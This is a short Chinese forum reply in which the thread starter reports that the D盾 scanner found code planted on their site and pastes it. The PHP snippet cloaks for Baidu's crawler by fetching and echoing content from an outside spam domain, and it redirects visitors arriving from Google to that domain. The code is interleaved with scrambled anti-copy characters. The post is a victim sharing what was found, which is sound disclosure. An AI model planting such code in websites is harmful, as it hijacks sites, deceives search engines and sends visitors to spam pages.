|

楼主 |
发表于 2017-11-26 04:22:32
|
显示全部楼层
谢谢大家,用D盾查到问题了,被挂了一段代码:! j6 X: Q: _7 f- |$ q7 G: X# m
$ Y. S. Q* o# H1 m. {! T+ j$ X ?$ H# e% B4 }- N4 h
<?php' k: A. D. p* ?' ?
if (ereg("http://www.baidu.com/search/spider.htm", $_SERVER["HTTP_USER_AGENT"])) {/ S# r$ n: z3 h& I: V' h
$file = file_get_contents('http://www。zb128。cc');. L! b, |9 N1 k, q
echo $file;//
0 u3 o0 q2 z. I+ |1 s& mexit;
" E8 F: M: T' v}" k6 j- `/ [# n8 J# }) y+ Y9 D
if(stristr ($_SERVER['HTTP_REFERER'],"google.com")) {
5 p! G4 U* x" ?4 }- L8 {Header("Location: http://www。zb128。cc");//
+ h( m, x1 q- W, d0 j2 Hexit; # x6 @7 F; D7 A
} |
|